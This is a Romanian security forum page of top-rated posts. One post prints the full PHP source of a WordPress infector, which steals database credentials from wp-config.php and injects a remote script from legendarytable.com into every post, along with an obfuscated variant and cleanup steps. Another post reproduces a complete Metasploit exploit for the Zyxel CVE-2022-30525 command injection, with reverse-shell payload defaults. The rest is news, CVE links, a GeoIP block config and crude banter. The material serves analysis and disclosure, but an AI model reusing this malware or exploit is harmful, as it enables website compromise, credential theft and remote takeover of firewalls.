Leaderboard
Popular Content
Showing content with the highest reputation on 05/17/22 in all areas
-
E de la pluginul "Elementor" Aici este sursa ce "infesteaza" jucariile: <?php error_reporting(0); ini_set('display_errors', 0); ini_set('max_execution_time', 0); echo "ssqqss>>>"; $d = $_SERVER['DOCUMENT_ROOT'] . "/"; $files = array(); for ($i = 0;$i < 3;$i++) { try { $az = shell_exec('find ' . $d . ' -name "wp-config.php"'); $az2 = explode("\n", $az); foreach ($az2 as $file) { $fil = explode("/wp-config.php", $file); $fil = $fil[0] . "/wp-config.php"; array_push($files, $fil); } $d = $d . "../"; } catch(Exception $e) { } } $l = "/"; for ($i = 0;$i < 3;$i++) { try { $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'] . $l); $display = Array( 'php' ); $search = Array( 'wp-config.php' ); $files_ar = array(); foreach (new RecursiveIteratorIterator($it) as $file) { if (strpos($file->getFilename() , 'wp-config.php') !== false) { array_push($files, $file->getPathname()); } } $l .= "../"; } catch(Exception $e) { } } $files = array_unique($files); foreach ($files as $file) { make_index_blog($file); } die(); function get_var_reg($pat, $text) { if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) { return $matches[1][0]; } return ""; } function getijstonemoretime($path) { } function make_index_blog($path) { echo "iii->>try:" . $path . "<br />"; $az = shell_exec('cat ' . $path); if (strpos($az, "DB_PASSWORD") !== false) { } else { } if (strpos($az, "DB_PASSWORD") !== false) { sqldo($az); } } function sqldo($content) { $siteurl = "null"; if (strpos($content, "DB_NAME") !== false) { $db = get_var_reg("DB_NAME['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $host = get_var_reg("DB_HOST['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $user = get_var_reg("DB_USER['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $pass = get_var_reg("DB_PASSWORD['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $conn = new mysqli($host, $user, $pass); if ($conn->connect_error) { echo $conn->connect_error; } else { $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%options%'"; $result = $conn->query($q) or die($conn->error); while ($row = $result->fetch_assoc()) { $result5 = $conn->query("SHOW COLUMNS FROM " . $db . "." . $row["TABLE_NAME"] . " LIKE 'option_name'"); if ($result5->num_rows > 0) { $q2 = "SELECT option_value FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " where option_name='siteurl' LIMIT 1 "; $result2 = $conn->query($q2) or var_dump($conn->error); while ($row2 = $result2->fetch_assoc()) { $val = $row2['option_value']; $siteurl = $val; echo "iii->>find222:" . $siteurl . "<br />"; if (strpos($siteurl, "://") !== false) { $k = file_get_contents($siteurl); if (strpos($k, "legendarytable") !== false) { echo "iii->>contains:" . $siteurl . "<br />"; } else { $q9 = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%posts%'"; $result9 = $conn->query($q9) or die($conn->error); while ($row9 = $result9->fetch_assoc()) { $q8 = "SELECT post_content FROM " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " LIMIT 1 "; $result8 = $conn->query($q8) or var_dump($conn->error); while ($row8 = $result8->fetch_assoc()) { $val8 = $row8['post_content']; if (strpos($val8, "legendarytable") === false) { $q3 = "UPDATE " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%legendarytable%'"; $conn->query($q3); echo "iii->>" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />"; } else { echo "iii->>222ALREADY:" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />"; } } } } } } } } } $conn->close(); } return $siteurl; } function search_file_index($dir, $file_to_search) { $files = @scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { search_file_index($dir, $file_to_search); return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { search_file_index($dir, $file_to_search); return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) { make_index_upload($path); } } else if ($value != "." && $value != "..") { search_file_index($path, $file_to_search); } } } Prin fisiere, o alta versiune (cea cu cookie check) arata asa: $v=chr(112).chr(114).chr(101).chr(103).chr(95).chr(109).chr(97).chr(116).chr(99).chr(104); if(!$v(chr(35).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr(97).chr(100).chr(109).chr(105).chr(110).chr(124).chr(119).chr(112).chr (45).chr(115).chr(101).chr(116).chr(116).chr(105).chr(110).chr(103).chr(115).chr(124).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr (108).chr(111).chr(103).chr(103).chr(101).chr(100).chr(35).chr(105),implode(" ",array_keys($_COOKIE)))){echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32). chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(116).chr(114).chr(105).chr(99).chr(107).chr(46).chr(108).chr(10 1).chr(103).chr(101).chr(110).chr(100).chr(97).chr(114).chr(121).chr(116).chr(97).chr(98).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(101).chr(119).c hr(115).chr(46).chr(106).chr(115).chr(63).chr(118).chr(61).chr(54).chr(46).chr(51).chr(46).chr(50).chr(39).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).ch r(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114). chr(105).chr(112).chr(116).chr(62);} Pentru a verifica checksum la fisierele din core, va recomand wp-cli Exemplu: ./wp --allow-root core verify-checksums Warning: File doesn't verify against checksum: wp-login.php Warning: File doesn't verify against checksum: wp-admin/index.php Warning: File doesn't verify against checksum: wp-admin/admin.php Warning: File doesn't verify against checksum: wp-admin/admin-ajax.php Warning: File should not exist: wp-admin/try.php Error: WordPress installation doesn't verify against checksums. Ar trebui sa dea cam asa: ./wp --allow-root core verify-checksums Success: WordPress installation verifies against checksums. Este necesara si eliminarea scripturilor din posts (wp_posts). Se poate identifica foarte usor printr-un query mysql: select * from wp_posts where post_content like '%news.js%'; De asemenea, se poate elimina din wp_posts utilizand replace. Aici vedeti ca pot fi mai multe versiuni. Puteti extinde cautarea dupa %script% sau/si legendarytable si apoi faceti replace la ce e necesar update wp_posts set post_content = replace(post_content, "<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>", ""); Mai este inca o versiune ce isi instaleaza 2 plugine (inactive) prin care isi pot rula diverse. O alta versiune isi face check la cookies. Acolo unde exista cookies, nu face redirect catre alte site. Vizeaza doar vizitatori noi pe care-i redirecteaza Sfat: 1. Nu mai instalati toate låbile de plugine 2. Folositi in plm Content-Security-Policy! :)))4 points
-
Era tare sa poti da tag la politia de pe forum. Si la aia de la SRI intrati aici precum gandacii pe langa conductele de termoficare :))))))3 points
-
S-a activat scriptu Blowjob :)))) Ce terminati frate2 points
-
Bulangiilor ce sunteti, d-aia am luat eu amenda ca am parcat masina gresit, n-ati avut ce sa-mi faceti pe forum si m-ati ars la parcare.2 points
-
2 points
-
Nimic nou sub soare...doar o mica reimprospatare despre cum functioneaza lumea 😂 De ce spun "lumea"? Ma indoiesc ca exista tari unde nu se practica....doar nivelul si sumele difera1 point
-
Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic. This involved infecting files such as jquery.min.js and jquery-migrate.min.js with obfuscated JavaScript that's activated on every page load, allowing the attacker to redirect the website visitors to a destination of their choice. The GoDaddy-owned website security company said that the domains at the end of the redirect chain could be used to load advertisements, phishing pages, malware, or even trigger another set of redirects. In some instances, unsuspecting users are taken to a rogue redirect landing page containing a fake CAPTCHA check, clicking which serves unwanted ads that are disguised to look as if they come from the operating system and not from a web browser. The campaign — a continuation of another wave that was detected last month — is believed to have impacted 322 websites so far, starting May 9. The April set of attacks, on the other hand, has breached over 6,500 websites. Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post. Source1 point
-
URLs: https://cvetrends.com/ https://cve.circl.lu/ Source: https://github.com/4D0niiS/CVE-Tracker1 point
-
This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection', 'Description' => %q{ This module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are: * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below * USG20-VPN and USG20W-VPN using firmware 5.21 and below * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below }, 'License' => MSF_LICENSE, 'Author' => [ 'jbaines-r7' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'CVE', '2022-30525' ], [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/'] ], 'DisclosureDate' => '2022-04-28', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_MIPS64,], 'Privileged' => false, 'Targets' => [ [ 'Shell Dropper', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_MIPS64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => [ 'curl', 'wget' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end # Checks the build date that is embedded in the landing page. If it finds a build # date older than April 20, 2022 then it will additionally check if the model is # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this # seems like a reasonable approach. def check res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/')) unless res return CheckCode::Unknown('The target failed to respond to check.') end unless res.code == 200 return CheckCode::Safe('Failed to retrieve /') end ver = res.body[/favicon\.ico\?v=(?<build_date>[0-9]{6,})/, :build_date] if ver.nil? return CheckCode::Safe('Could not extract a version number') end if ver[0..5].to_i < 220420 model = res.get_html_document.xpath('//title').text if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN')) return CheckCode::Appears("This was determined by the model and build date: #{model}, #{ver}") end end CheckCode::Safe("This determination is based on the build date string: #{ver}.") end def execute_command(cmd, _opts = {}) handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler') print_status("Sending command to #{handler_uri}") # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too # but it's more involved. http_payload = { 'command' => 'setWanPortSt', 'proto' => 'dhcp', 'port' => Rex::Text.rand_text_numeric(4).to_s, 'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s, 'vlanid' => Rex::Text.rand_text_numeric(4).to_s, 'mtu' => ";#{cmd};", 'data' => '' } res = send_request_cgi({ 'method' => 'POST', 'uri' => handler_uri, 'headers' => { 'Content-Type' => 'application/json; charset=utf-8' }, 'data' => http_payload.to_json }) # Successful exploitation can result in no response (connection being held open by a reverse shell) # or, if the command executes immediately, a response with a 503. if res && res.code != 503 fail_with(Failure::UnexpectedReply, "The target replied with HTTP status #{res.code}. No reply was expected.") end print_good('Command successfully executed.') end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end # 0day.today [2022-05-17] # Source1 point
-
Buna ideea. Cu GeoIP mod pt. apache GeoIPEnable On # doamne futa-va pe toti si scapam de greutati :)) SetEnvIf GEOIP_COUNTRY_CODE CN BlockCountry SetEnvIf GEOIP_COUNTRY_CODE RU BlockCountry SetEnvIf GEOIP_COUNTRY_CODE UA BlockCountry SetEnvIf GEOIP_COUNTRY_CODE IN BlockCountry <RequireAll> Require all granted Require not env BlockCountry </RequireAll>1 point